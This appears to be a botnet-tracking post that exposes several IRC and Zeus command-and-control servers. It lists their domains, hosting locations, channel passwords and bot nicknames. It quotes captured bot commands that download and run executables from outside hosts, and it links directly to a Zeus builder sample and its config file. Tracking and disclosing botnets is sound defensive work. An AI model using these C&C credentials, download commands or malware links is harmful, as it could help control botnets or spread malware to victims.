p3dr1t0.info(ngrBot hosted in United States Herndon Road Runner Holdco Llc)

Remote Host Port Number 80 80 6060 PASS secret Local users: Current Local Users: 283 Max: 2070 Global users: Current Global Users: 283 Max: 1422 NICK n{US|XPa}scmyjzc USER scmyjzc 0 0 :scmyjzc PONG :7D743289 JOIN #hell secret PRIVMSG #hell :[d=”http://www.lomopalta.com/plugins/new.exe” s=”176128 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataScxaxs.exe” – Download retries:

nhg.knaqu.eu(irc botnet hosted in Denmark Tranbjerg Tdc A/s)

same guy run this botnet http://www.exposedbotnets.com/2010/04/ds32v7k3knaqueu.html Resolved : [nhg.knaqu.eu] To [] Remote Host Port Number 4244 PASS NhG MODE [USA|NhGXP|031763] -ix JOIN #!En!# #xp PRIVMSG #!en!# :MSN: Thread Activated, Sending Message. PONG HTTP1.4 NICK [USA|NhGXP|031763] USER xyygsge * 0 :COMPUTERNAME Now talking in #!en!# Topic On: [ #!en!# ] [ .msn look here is

sw.l33t-milf.info( 100k reptile bots spreading via ms exploit)

This is one of the biggest irc botnets still active 13 leafs full of bots I estimated the botnet size to 100k considering the number of leafs 13 but the real size can be bigger Domain names used to control bots: sw.l33t-milf.info pics.l33t-ppl.info Resolved : [sw.l33t-milf.info] To [] Resolved : [sw.l33t-milf.info] To [] Resolved :

i.nerashti.net(irc botnet hosted in India Delhi Mtnl Cat B Isp)

Resolved : [i.nerashti.net] To [] Remote Host Port Number 80 80 80 4244 PASS 666666 6667 PASS 666666 PRIVMSG #buli# :[d=”http://dl.dropbox.com/u/66711623/v/e/rundat.exe” s=”92160 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.exe” – Download retries: 0 NICK n{US|XPa}eechxgg USER eechxgg 0 0 :eechxgg JOIN #BuLi# redem PRIVMSG #buli# :[MSN]: Updated MSN spread interval

vps1.imafish.net(ngrBot hosted in United States Input Output Flood Llc)

Resolved : [vps1.imafish.net] To [] Local users: Current Local Users: 47 Max: 132 Global users: Current Global Users: 47 Max: 132 C&C Server: Server Password: Username: hewjcgy Nickname: n{DE|XPa}hewjcgy Channel: #botn (Password: ngrBot) Channeltopic: : Topic On: [ #botn ] [ ] Topic By: [ MagicSata ] hosting infos: http://whois.domaintools.com/

zxz666.darktech.org(zeus hosted in Russian Federation Moscow Ojsc Vimpelcom)

zeus sample here http://zxz666.darktech.org/zeus/builder/bot.exe zeus config file here http://zxz666.darktech.org/zeus/builder/cfg2.bin when u open zxz666.darktech.org u are redirected to vkontakte.ru wich ask for login maybe masking atempt or vkontakte.ru is now used to control zeus bots zeus samples just in case they get deleted by the hecker hosting infos: http://whois.domaintools.com/ botnet hosted in United States Chicago Hostforweb Inc)

Remote Host Port Number 2345 NICK New[USA|00|P|41019] PRIVMSG #!loco! :[M]: Thread Disabled. PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email. USER XP-6548 * 0 :COMPUTERNAME MODE New[USA|00|P|41019] -ix JOIN #!loco! PONG 22 MOTD hosting infos: http://whois.domaintools.com/